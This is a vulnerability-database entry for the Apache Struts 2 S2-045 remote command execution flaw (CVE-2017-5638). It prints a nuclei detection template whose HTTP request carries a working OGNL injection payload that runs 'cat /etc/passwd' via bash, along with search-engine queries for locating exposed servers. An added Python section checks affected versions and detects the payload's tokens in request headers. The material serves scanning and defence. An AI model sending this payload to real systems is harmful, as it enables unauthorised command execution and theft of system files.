Apache Struts 2 - Remote Command Execution

Published 16 Jun 2026 07:13:51. Reported by ProjectDiscovery. Type: nuclei. Source: github.com. 134 views.

The Apache Struts 2 Remote Command Execution vulnerability (CVE-2017-5638, S2-045) lets unauthenticated remote attackers execute arbitrary commands on the server via crafted HTTP headers handled by the Jakarta Multipart parser. Upgrade to 2.3.32 or 2.5.10.1, or apply the vendor patches.

Related

All ten related entries are IBM Security Bulletins (reporter: ibm); published date and title:

18 Jun 2018 01:35  Security Bulletin: A vulnerability in Apache Struts 2 affects IBM Platform Symphony and IBM Spectrum Symphony (CVE-2017-5638)
18 Jun 2018 00:34  Security Bulletin: Vulnerability in Apache Struts affects Storwize V7000 Unified (CVE-2017-5638)
18 Jun 2018 01:35  Security Bulletin: Apache Struts v2 Jakarta Multipart parser code execution affects IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation (CVE-2017-5638)
15 Jun 2018 22:50  Security Bulletin: Vulnerability in Apache Struts affects IBM Social Media Analytics (CVE-2017-5638)
18 Jun 2018 00:32  Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem model V840
16 Jun 2018 20:09  Security Bulletin: IBM Sterling Order Management is affected by a vulnerability (CVE-2017-5638)
13 Jul 2022 18:04  WebSphere Application Server and IBM HTTP Server Security Bulletin List
18 Feb 2023 01:45  Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem models 840 and 900
29 Mar 2023 01:48  Security Bulletin: Vulnerability in Apache Struts affects SAN Volume Controller, Storwize family and FlashSystem V9000 products (CVE-2017-5638)
15 Jun 2018 22:49  Security Bulletin: IBM OpenPages GRC Platform Web Applications are not vulnerable to (CVE-2017-5638)

Code

id: CVE-2017-5638

info:
  name: Apache Struts 2 - Remote Command Execution
  author: Random_Robbie
  severity: critical
  description: |
    Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is susceptible to remote command injection attacks. The Jakarta Multipart parser has incorrect exception handling and error-message generation during file upload attempts, which can allow an attacker to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header. This was exploited in March 2017 with a Content-Type header containing a #cmd= string.
  impact: |
    Remote attackers can execute arbitrary commands on the target system.
  remediation: |
    Upgrade to Apache Struts 2.3.32 or 2.5.10.1 or apply the necessary patches.
  reference:
    - https://github.com/mazen160/struts-pwn
    - https://isc.sans.edu/diary/22169
    - https://github.com/rapid7/metasploit-framework/issues/8064
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5638
    - http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2017-5638
    cwe-id: CWE-20
    epss-score: 0.99999
    epss-percentile: 0.99993
    cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: struts
    shodan-query:
      - html:"Apache Struts"
      - http.title:"struts2 showcase"
      - http.html:"struts problem report"
      - http.html:"apache struts"
    fofa-query:
      - body="struts problem report"
      - title="struts2 showcase"
      - body="apache struts"
    google-query: intitle:"struts2 showcase"
  tags: cve2017,cve,apache,kev,msf,struts,rce,vkev,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: %{(#test='multipart/form-data').(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd="cat /etc/passwd",#cmds={"/bin/bash","-c",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a004630440220536b116665a6bd68b94869a8ef8dd137394472e43c9a53d6eb27e4c7f416eaec022036c24cffdb35dedb8238ace62eb1eb53c460813e6de3d0e00f0bee3a5a5fc7a8:922c64590222798bb761d5b6d8e72950
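Three checks a practitioner would pair with this template, as an added example (this is not code from the nuclei template, ProjectDiscovery, or the Vulners page): the affected-version test taken from the template's description (2.3.x before 2.3.32, 2.5.x before 2.5.10.1), a header-level detector for S2-045 style OGNL injection in the Content-Type, Content-Disposition and Content-Length headers that a WAF rule or a request-log review can reuse, and the template's own matcher logic (HTTP 200 and a `root:.*:0:0:` line) applied to a captured response. The function names, the host `struts.example.test`, and the sample headers and response bodies are assumptions constructed for illustration; the malicious sample is the template's Content-Type shortened to its sandbox-escape prefix.

```python
# Added example, not code from the nuclei template or the Vulners page.
# Three checks a practitioner would pair with the CVE-2017-5638 template:
#   1. is_vulnerable_version(): the affected ranges from the description
#      (2.3.x before 2.3.32, 2.5.x before 2.5.10.1).
#   2. looks_like_s2_045(): header-level detection of S2-045 style OGNL
#      injection in Content-Type / Content-Disposition / Content-Length,
#      usable as a WAF rule or over captured request headers.
#   3. template_matches(): the template's matcher logic (status 200 AND
#      body matches root:.*:0:0:) applied to a captured response.
# All sample headers and bodies below are constructed for illustration.
import re
from typing import Dict, List, Mapping, Tuple


def parse_version(version: str) -> Tuple[int, ...]:
    """'2.5.10.1' -> (2, 5, 10, 1); any non-numeric suffix is ignored."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)", version)
    if not m:
        raise ValueError("unrecognised Struts version: %r" % version)
    return tuple(int(p) for p in m.group(1).split("."))


# (inclusive lower bound, exclusive first fixed release), per the description.
VULNERABLE_RANGES = (
    ((2, 3), (2, 3, 32)),
    ((2, 5), (2, 5, 10, 1)),
)


def is_vulnerable_version(version: str) -> bool:
    """True for a Struts version inside an affected range (tuple comparison)."""
    v = parse_version(version)
    return any(lo <= v < fixed for lo, fixed in VULNERABLE_RANGES)


# A legitimate value for these three headers is a media type with parameters,
# a filename parameter, or a decimal length. OGNL expression delimiters never
# occur in them, and neither do the sandbox-escape / process-spawn tokens the
# public S2-045 payloads use, so either class of token counts as a hit.
OGNL_DELIMITER = re.compile(r"%\{|\$\{")
OGNL_TOKENS = re.compile(
    r"#_memberAccess|@ognl\.OgnlContext@|DEFAULT_MEMBER_ACCESS|"
    r"java\.lang\.ProcessBuilder|java\.lang\.Runtime|ServletActionContext|"
    r"getExcludedPackageNames|getExcludedClasses|#cmd\s*=",
    re.IGNORECASE,
)
SUSPECT_HEADERS = ("content-type", "content-disposition", "content-length")


def looks_like_s2_045(headers: Mapping[str, str]) -> List[str]:
    """Names of the headers (as given) that carry an S2-045 style payload."""
    hits = []
    for name, value in headers.items():
        if name.lower() not in SUSPECT_HEADERS:
            continue
        if OGNL_DELIMITER.search(value) or OGNL_TOKENS.search(value):
            hits.append(name)
    return hits


# The template's two matchers, joined by matchers-condition: and.
ROOT_ENTRY = re.compile(r"root:.*:0:0:")


def template_matches(status: int, body: str) -> bool:
    """True when a response satisfies the template (HTTP 200 and a root passwd line)."""
    return status == 200 and ROOT_ENTRY.search(body) is not None


# Constructed request headers: the template's Content-Type shortened to its
# sandbox-escape prefix, next to a benign multipart upload. The host is made up.
MALICIOUS_HEADERS: Dict[str, str] = {
    "Host": "struts.example.test",
    "Content-Type": "%{(#test='multipart/form-data')."
                    "(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
                    "(#cmd='cat /etc/passwd')}",
}
BENIGN_HEADERS: Dict[str, str] = {
    "Host": "struts.example.test",
    "Content-Type": "multipart/form-data; boundary=----FormBoundary7MA4YWxkTrZu0gW",
    "Content-Length": "1324",
}

if __name__ == "__main__":
    for ver in ("2.3.5", "2.3.31", "2.3.32", "2.5.10", "2.5.10.1"):
        print("%-9s vulnerable=%s" % (ver, is_vulnerable_version(ver)))
    print("malicious hits:", looks_like_s2_045(MALICIOUS_HEADERS))
    print("benign hits:", looks_like_s2_045(BENIGN_HEADERS))
    print("template matches:", template_matches(200, "root:x:0:0:root:/root:/bin/bash\n"))
```

The detector inspects raw header values as the servlet container sees them (no percent-decoding is applied to headers), which is also where the Jakarta Multipart parser reads them, so a rule built on it fires on the same bytes the vulnerable code evaluates.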

Scores (current as of 04 Feb 2026 07:00)

Vulners AI Score: 8.9 (High risk)
CVSS 3.1: 9.8
CVSS 2: 10
EPSS: 0.99999